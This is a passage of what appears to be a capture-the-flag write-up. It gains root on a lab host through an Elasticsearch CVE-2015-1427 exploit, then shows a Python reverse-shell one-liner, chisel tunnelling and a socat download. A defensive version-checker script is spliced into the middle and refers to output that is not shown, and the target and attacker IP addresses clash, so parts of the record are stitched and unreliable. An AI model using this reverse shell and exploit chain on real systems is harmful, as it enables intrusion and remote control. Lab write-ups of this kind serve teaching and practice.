┌──(root㉿CCat)-[~]
└─# curl -s http://192.168.2.199:9200/blog | jq
{
"blog": {
"mappings": {
"user": {
"properties": {
"name": {
"type": "string"
}
}
}
},
"settings": {
"index": {
"creation_date": "1729799457745",
"uuid": "3kdJIs98QBKAcfQBq7ZVFA",
"number_of_replicas": "1",
"number_of_shards": "5",
"version": {
"created": "1040299"
}
}
}
}
}
┌──(root㉿CCat)-[~]
└─# curl -s http://192.168.2.199:9200/blog/_search?pretty=true | jq
{
"took": 21,
"timed_out": false,
"_shards": {
"total": 5,
"successful": 5,
"failed": 0
},
"hits": {
"total": 1,
"max_score": 1.0,
"hits": [
{
"_index": "blog",
"_type": "user",
"_id": "dilbert",
"_score": 1.0,
"_source": {
"name": "Dilbert Brown"
}
}
]
}
}
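The unauthenticated root document and the _cat/indices listing above are exactly what a defender should be checking for on their own network. The following checker is an added example (not part of the original write-up): it parses both responses offline from embedded copies of the values shown above, maps the version onto the CVE-2015-1427 affected ranges (1.3.0 to 1.3.7 and 1.4.0 to 1.4.2, fixed in 1.3.8 and 1.4.3 per Elastic's advisory), and lists the indices exposed without authentication. The function names are my own.

```python
import json

# Constructed sample input: the root document and _cat/indices?v output of the
# Elasticsearch node reached through the chisel tunnel (values as shown above).
ES_ROOT = """{
  "status": 200, "name": "Drax the Destroyer", "cluster_name": "elasticsearch",
  "version": {"number": "1.4.2", "build_hash": "927caff6f05403e936c20bf4529f144f0c89fd8c",
              "build_timestamp": "2014-12-16T14:11:12Z", "build_snapshot": false,
              "lucene_version": "4.10.2"},
  "tagline": "You Know, for Search"
}"""
CAT_INDICES = """health status index pri rep docs.count docs.deleted store.size pri.store.size
yellow open blog 5 1 1 0 3kb 3kb
"""


def parse_version(number):
    """'1.4.2' -> (1, 4, 2); a '-SNAPSHOT' style suffix is ignored."""
    return tuple(int(p) for p in number.split("-")[0].split(".")[:3])


def affected_by_cve_2015_1427(number):
    """Groovy sandbox bypass: affects 1.3.0-1.3.7 and 1.4.0-1.4.2, fixed in
    1.3.8 and 1.4.3. Other branches did not ship the sandboxed Groovy engine."""
    v = parse_version(number)
    if v[:2] == (1, 3):
        return v < (1, 3, 8)
    if v[:2] == (1, 4):
        return v < (1, 4, 3)
    return False


def parse_cat_indices(text):
    """Turn the whitespace-aligned _cat/indices?v table into a list of dicts."""
    rows = [line.split() for line in text.strip().splitlines() if line.strip()]
    header, body = rows[0], rows[1:]
    return [dict(zip(header, row)) for row in body]


def assess(root_json, cat_indices):
    """Summarise what an unauthenticated request to the node reveals."""
    root = json.loads(root_json)
    number = root["version"]["number"]
    return {
        "node": root["name"],
        "cluster": root["cluster_name"],
        "version": number,
        "cve_2015_1427": affected_by_cve_2015_1427(number),
        "indices": [i["index"] for i in parse_cat_indices(cat_indices)],
    }


if __name__ == "__main__":
    print(json.dumps(assess(ES_ROOT, CAT_INDICES), indent=2))
```

A node that reports an affected version and answers without credentials, as this one does, needs an upgrade or at least dynamic Groovy scripting disabled and the port kept off any untrusted network.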

We run the Elasticsearch exploit against the tunnelled port.

┌──(root㉿CCat)-[~]
└─# python2 elasticsearch.py 192.168.2.199
Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ id
uid=0(root) gid=0(root) groups=0(root)

We have a root shell on the other system!

Privilege Escalation

We try again to start a reverse shell in order to get a more stable connection.

┌──(root㉿CCat)-[~]
└─# python2 elasticsearch.py 192.168.2.199
Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ hostname -i
172.17.0.3

We try again to start a reverse shell together with chisel.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.199",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
./chisel client 192.168.2.199:1234 R:9200:172.17.0.3:9200
/app # ./chisel client 192.168.2.199:1234 R:9200:172.17.0.3:9200 &
/app # 2024/10/24 22:17:21 client: Connecting to ws://192.168.2.199:1234
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/app # 2024/10/24 22:17:46 client: Connection error: dial tcp 192.168.2.199:1234: connect: connection refused (Attempt: 8/unlimited)
2024/10/24 22:17:46 client: Retrying in 25.6s...
jobs
[1]+ Running ./chisel client 192.168.2.199:1234 R:9200:172.17.0.3:9200

We upload socat to the target system.

┌──(root㉿CCat)-[/usr/bin]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.2.117 - - [25/Oct/2024 00:32:29] "GET /socat HTTP/1.1" 200 -
/app # wget 192.168.2.199/socat
Connecting to 192.168.2.199 (192.168.2.199:80)
socat 100% |********************************| 462k 0:00:00 ETA
/app # chmod +x socat

Flags

Here are the flags we found.

cat user.txt userflag
cat root.txt rootflag